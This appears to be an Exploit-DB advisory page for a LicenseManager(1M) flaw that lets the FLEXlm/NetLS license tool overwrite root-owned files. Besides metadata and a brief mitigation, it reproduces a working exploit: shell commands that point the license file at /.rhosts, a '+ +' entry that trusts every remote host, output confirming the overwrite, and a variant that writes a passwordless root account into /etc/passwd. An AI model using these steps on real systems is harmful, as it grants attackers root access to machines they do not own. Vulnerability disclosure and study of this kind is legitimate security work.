LicenseManager(1M) Overwrite Root-Owned Files

vendor:

LicenseManager(1M)

by:

Unknown

8.8

CVSS

HIGH

LicenseManager(1M) Overwrite Root-Owned Files

264

CWE

Product Name: LicenseManager(1M)

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: No

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

Unknown

LicenseManager(1M) Overwrite Root-Owned Files

LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. A vulnerability has been discovered that allows LicenseManager(1M) to overwrite root-owned files, such as /.rhosts, with arbitrary content. This can be exploited to gain root access if remote root logins are enabled.

Mitigation:

Disable remote root logins and ensure that LicenseManager(1M) is not installed on the system.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/72/info

Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to
overwrite root-owned files allowing root access.

% setenv NETLS_LICENSE_FILE /.rhosts
% /usr/etc/LicenseManager &

Install...
NetLS Node-locked
Vendor Name: whatever 
Vendor ID: + + 
Product name: whatever 
License version: 1.000 
License version: 
Expiration date: 01-jan-0 

(in license version field put a space) 

Apply 

License(s) succesfully installed 

% cat /.rhosts 
#:# "whatever" "whatever" "1.000" "Incomplete" 
+ + 

If your system has remote root logins disabled, replacing /.rhosts with 
/etc/passwd and + + with toor:0:0::/:/bin/sh.